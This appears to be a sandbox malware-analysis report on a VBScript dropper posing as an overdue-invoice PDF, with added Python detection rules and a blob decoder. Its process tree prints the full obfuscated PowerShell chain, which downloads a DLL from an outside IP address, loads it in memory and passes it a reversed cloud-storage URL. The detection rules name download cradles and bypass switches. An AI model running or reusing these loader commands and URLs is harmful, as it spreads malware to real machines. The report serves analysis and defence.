Analysis
- max time kernel: 42s
- max time network: 45s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 01-07-2022 20:31
- Static task: static1
- Behavioral task: behavioral1
- Sample: DETALLES FACTUTACION VENCIDA.PDF.vbs
- Resource: win7-20220414-en

General
- Target: DETALLES FACTUTACION VENCIDA.PDF.vbs
- Size: 208KB
- MD5: c2a54f061aba21192c2366e5aff19ef3
- SHA1: 0e35261883e5bbe9df33797d230f7180309b083e
- SHA256: 80d4b70c3b8c11f6c761e105ce14f61e191a89cc8bd81ee86fb741f48bfdb7ff
- SHA512: 59ebcecb57800046d977e2fdd733d29e41d3ca14feab25b730ceeee8e6f4fa5e40e72eff2c3a629c8d9af298dbad1e18c1a34d87cef76e908f754f3221b558db

Note on the target name: the double extension .PDF.vbs makes the file display as a PDF when Explorer hides known extensions, while the Windows Script Host (WScript.exe, the first process in the tree below) is what actually runs it.
Malware Config
- Extracted: http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow 3, pid 1632, powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid 1976, powershell.exe
    pid 1632, powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    Token: SeDebugPrivilege, pid 1976, powershell.exe
    Token: SeDebugPrivilege, pid 1632, powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (source pid wrote to target pid; each source is the parent of its target in the process tree below):
    PID 1228 (WScript.exe) wrote to memory of 1976 (powershell.exe), recorded 3 times
    PID 1976 (powershell.exe) wrote to memory of 1632 (powershell.exe), recorded 3 times
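The signatures above can be turned into process-creation detection logic. The following is an added example, not part of the sandbox report: the rules encode the behaviours listed under Signatures (script host spawning PowerShell, PowerShell spawning PowerShell, a Base64-staged command, a download cradle, an in-memory assembly load, and hidden-window/execution-policy switches), and the events are Sysmon-style records constructed from the process tree in this report, with command lines trimmed. The parent of WScript.exe is assumed to be explorer.exe, which the report does not show, and the benign fourth event is constructed as a control. One edge case from this sample is handled deliberately: the third process passes `-ExecutionPolicy Bypss` (sic) and still runs and makes its network request, so the rule keys on the switch name rather than on the literal value `Bypass`.

```python
"""Process-creation triage for the WScript -> PowerShell -> PowerShell chain.

Added example, not part of the sandbox report: the rules encode the behaviours
listed under Signatures, and the events are Sysmon-style records constructed
from the process tree in this report (command lines trimmed; the parent of
WScript.exe is assumed to be explorer.exe, which the report does not show).
"""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def _image(path):
    """Lower-cased file name of a Windows image path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def _cmd_has(pattern):
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda ev: rx.search(ev["CommandLine"]) is not None


RULES = [
    ("script_host_spawns_powershell",
     lambda ev: _image(ev["ParentImage"]) in SCRIPT_HOSTS
     and _image(ev["Image"]) == "powershell.exe"),
    ("powershell_spawns_powershell",
     lambda ev: _image(ev["ParentImage"]) == "powershell.exe"
     and _image(ev["Image"]) == "powershell.exe"),
    ("base64_staged_command",
     _cmd_has(r"frombase64string|-encodedcommand|\s-e(nc)?\s")),
    ("download_cradle",
     _cmd_has(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient")),
    ("in_memory_assembly_load",
     _cmd_has(r"appdomain\]::currentdomain\.load|reflection\.assembly\]::load")),
    # Key on the switch, not its value: this sample passes '-ExecutionPolicy Bypss'
    # (sic) and still runs, so a rule looking for the literal word 'Bypass' misses it.
    ("hidden_or_bypass_switches",
     _cmd_has(r"-w(indowstyle)?\s+hidden|-ex(ecutionpolicy)?\s+\S+")),
]


def match_rules(event):
    """Names of all rules the event satisfies, in RULES order."""
    return [name for name, pred in RULES if pred(event)]


def triage(events, threshold=2):
    """Map pid -> matched rule names for events satisfying at least `threshold` rules."""
    hits = {}
    for ev in events:
        names = match_rules(ev)
        if len(names) >= threshold:
            hits[ev["ProcessId"]] = names
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\WScript.exe"

# Constructed events modelled on the report's tree (pids 1228 -> 1976 -> 1632),
# plus one benign PowerShell launch (pid 2000, constructed) that must not fire.
EVENTS = [
    {"ProcessId": 1228, "Image": WSCRIPT, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs"'},
    {"ProcessId": 1976, "Image": PS, "ParentImage": WSCRIPT,
     "CommandLine": (r"powershell.exe -command $iUqm = 'JABSAG8AZABhAEMA...';"
                     r"$OWjuxD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($iUqm.replace('⚔⚔⚔','U')));"
                     r"powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD")},
    {"ProcessId": 1632, "Image": PS, "ParentImage": PS,
     "CommandLine": (r"powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "
                     r"[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt'));"
                     r"[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('...//:sptth', $RodaCopy, 'note'))")},
    {"ProcessId": 2000, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-Process"},
]

if __name__ == "__main__":
    for pid, names in triage(EVENTS).items():
        print(pid, names)
```

With the default threshold of two rules, pids 1976 and 1632 are reported and the control launch is not; a single-rule match (a hidden window on its own, say) is left below the alert threshold so the chain, not one switch, is what fires.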
Processes
1. C:\Windows\System32\WScript.exe
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEMAbwBwAHkA⚔⚔⚔wB0AGEAcgB0AH⚔⚔⚔AcABSAG8AZABhAC⚔⚔⚔AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBTAHkAcwB0AG⚔⚔⚔AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMwAuADEAMAA2AC4AMQA5ADEALgAxADAANQAvAGQAbABsAC8AZABsAGwAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQALgB0AHgAdAAnACkAKQA7AFsA⚔⚔⚔wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⚔⚔⚔AcgByAG⚔⚔⚔AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⚔⚔⚔AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⚔⚔⚔ARwBsAHkAbQB6AF⚔⚔⚔AZwAnACkALgBHAG⚔⚔⚔AdABNAG⚔⚔⚔AdABoAG8AZAAoACcAVQBEAHMA⚔⚔⚔wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⚔⚔⚔AbABsACwAIABbAG8AYgBqAG⚔⚔⚔AYwB0AFsAXQBdACAAKAAnADEAMAAzADAAMAA5ADAAZgA0AGMANAA4AC0AYwAzADIAOAAtADEAMQAxADQALQA3ADEAYQA3AC0AYwA0ADYANgAxAGYAOAA0AD0AbgBlAGsAbwB0ACYAYQBpAGQAZQBtAD0AdABsAGEAPwB0AHgAdAAuAE8AVABYAE⚔⚔⚔AVAAvAG8ALwBtAG8AYwAuAHQAbwBwAHMAcABwAGEALgB0AG4AZQBwAG4AaQB0AHMAZQB0AC8AYgAvADAAdgAvAG0AbwBjAC4AcwBpAHAAYQBlAGwAZwBvAG8AZwAuAG⚔⚔⚔AZwBhAHIAbwB0AHMAZQBzAGEAYgBlAHIAaQBmAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⚔⚔⚔gBvAGQAYQBDAG8AcAB5ACAALAAgACcAbgBvAHQAZQAnACAAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('⚔⚔⚔','U') ) );$OWjuxD = $OWjuxD.replace('%CopyStartupRoda%', 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('1030090f4c48-c328-1114-71a7-c4661f84=nekot&aidem=tla?txt.OTXET/o/moc.topsppa.tnepnitset/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'note' ))"
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
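The sandbox already shows the decoded stage-2 command for pid 1632, but the decoding is worth doing by hand because the blob is not plain Base64: the letter U has been swapped for a three-emoji sentinel, the decoded bytes are UTF-16LE (what `[System.Text.Encoding]::Unicode.GetString` expects), a placeholder is patched in afterwards, and the first argument handed to the downloaded DLL is a string written backwards. The following decoder is an added example, not part of the report or of the sample. The Base64 prefix, the placeholder name, the stage-2 command and the reversed literal are copied from the command lines above; the blob is truncated here (by me, not by the report) at the point where the stage-2 download URL has been reached, and the `.vbs` path passed to `analyse()` is a placeholder. That the reversed literal is a download location for a third stage is an inference from its shape once reversed; the report does not say what `UDsSiDbb` does with it.

```python
"""Decode the staged PowerShell shown in the process tree above.

Added example, not part of the sandbox report or of the sample. The Base64
prefix, placeholder and stage-2 command are copied from the report; the blob
is truncated here (by me) once the stage-2 download URL has been reached.
"""
import base64
import re

# The dropper swaps the letter 'U' for three U+2694 characters, so the blob is
# not even ASCII (base64.b64decode would raise) until the sentinel is put back.
SENTINEL = "⚔⚔⚔"
PLACEHOLDER = "%CopyStartupRoda%"

# Leading part of $iUqm from the stage-1 command line.
STAGE1_BLOB = (
    "JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEMAbwBwAHkA⚔⚔⚔wB0AGEAcgB0AH⚔⚔⚔AcABSAG8AZABhAC⚔⚔⚔AJwA7AFsA"
    "QgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBTAHkAcwB0AG⚔⚔⚔AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoA"
    "RgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4A"
    "VwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8A"
    "LwAxADkAMwAuADEAMAA2AC4AMQA5ADEALgAxADAANQAvAGQAbABsAC8AZABsAGwAJQBFADIAJQA5ADMAJQA5ADQA"
    "JQBFADIAJQA5ADMAJQA5ADQAJQBFADIAJQA5ADMAJQA5ADQALgB0AHgAdAAnACkAKQA7AFsA"
)

# Stage-2 command as the sandbox recorded it for pid 1632 (outer quotes dropped).
STAGE2_COMMAND = r"""$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DETALLES FACTUTACION VENCIDA.PDF.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://193.106.191.105/dll/dll%E2%93%94%E2%93%94%E2%93%94.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('1030090f4c48-c328-1114-71a7-c4661f84=nekot&aidem=tla?txt.OTXET/o/moc.topsppa.tnepnitset/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $RodaCopy , 'note' ))"""


def decode_stage(blob, sentinel=SENTINEL, replacement="U"):
    """Undo the sentinel swap, Base64-decode, then decode UTF-16LE (PowerShell's
    'Unicode' encoding); this is what the stage-1 wrapper does on the host."""
    raw = base64.b64decode(blob.replace(sentinel, replacement))
    return raw.decode("utf-16-le")


def expand_placeholder(script, sample_path, placeholder=PLACEHOLDER):
    """Stage 1 patches the on-disk path of the .vbs into the decoded script."""
    return script.replace(placeholder, sample_path)


URL_RE = re.compile(r"https?://[^\s'\"()]+")
LITERAL_RE = re.compile(r"'([^']*)'")


def extract_urls(script):
    """Plain URLs plus any single-quoted literal that is a URL written backwards."""
    found = set(URL_RE.findall(script))
    for literal in LITERAL_RE.findall(script):
        if literal.endswith(("//:ptth", "//:sptth")):
            found.add(literal[::-1])
    return sorted(found)


def analyse(blob=STAGE1_BLOB, stage2=STAGE2_COMMAND,
            sample_path=r"C:\path\to\sample.vbs"):   # placeholder path, not the report's
    stage1 = expand_placeholder(decode_stage(blob), sample_path)
    return {
        "stage1_script": stage1,
        "stage1_urls": extract_urls(stage1),
        "stage2_urls": extract_urls(stage2),
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(key, value)
```

Run as a script it prints the decoded prefix, the stage-2 download URL recovered from the blob, and both URLs from the stage-2 command, the second of them the reversed literal read forwards. The reversal check is deliberately keyed on the literal ending in `//:ptth` or `//:sptth` rather than on a generic "looks reversed" heuristic, so it costs nothing on ordinary scripts.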
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  (Windows jump-list file, a shell artifact of opening the sample, not a payload)
  Filesize: 7KB
  MD5: f12f97f3591dc41abb731cf8f3ca52dd
  SHA1: 758f2c56039a64d2896d3eb3578fe02a2dc8ae93
  SHA256: 43b69e288b5309cd37216bc5036d065ad7f0725067b937899d409e0527aa263a
  SHA512: 6d5dff4feb63379069abdd12c62973fa3da02986fa9c0b8354a2e4f9b2d3480d421720b7e85ccfd8f0b2afdbfb56843d4703e96576705d1776f24509bfe97f4f

The stage-2 DLL fetched from 193.106.191.105 is passed straight from the downloaded bytes to AppDomain.Load and is never written to disk, so no payload file appears in this list; the process memory dumps below (pid 1632 in particular) are where it would have to be carved from.

Memory dumps (pid-sequence-address range, size):
- memory/1228-54-0x000007FEFB871000-0x000007FEFB873000-memory.dmp (8KB)
- memory/1632-61-0x0000000000000000-mapping.dmp
- memory/1632-64-0x000007FEF3D80000-0x000007FEF47A3000-memory.dmp (10.1MB)
- memory/1632-65-0x000007FEF3220000-0x000007FEF3D7D000-memory.dmp (11.4MB)
- memory/1632-67-0x00000000027B4000-0x00000000027B7000-memory.dmp (12KB)
- memory/1632-68-0x000000001B730000-0x000000001BA2F000-memory.dmp (3.0MB)
- memory/1632-69-0x00000000027BB000-0x00000000027DA000-memory.dmp (124KB)
- memory/1632-70-0x00000000027B4000-0x00000000027B7000-memory.dmp (12KB)
- memory/1632-71-0x00000000027BB000-0x00000000027DA000-memory.dmp (124KB)
- memory/1976-55-0x0000000000000000-mapping.dmp
- memory/1976-57-0x000007FEF3D80000-0x000007FEF47A3000-memory.dmp (10.1MB)
- memory/1976-58-0x000007FEF3220000-0x000007FEF3D7D000-memory.dmp (11.4MB)
- memory/1976-59-0x00000000024E4000-0x00000000024E7000-memory.dmp (12KB)
- memory/1976-60-0x000000001B880000-0x000000001BB7F000-memory.dmp (3.0MB)
- memory/1976-66-0x00000000024EB000-0x000000000250A000-memory.dmp (124KB)
- memory/1976-72-0x00000000024E4000-0x00000000024E7000-memory.dmp (12KB)
- memory/1976-73-0x00000000024EB000-0x000000000250A000-memory.dmp (124KB)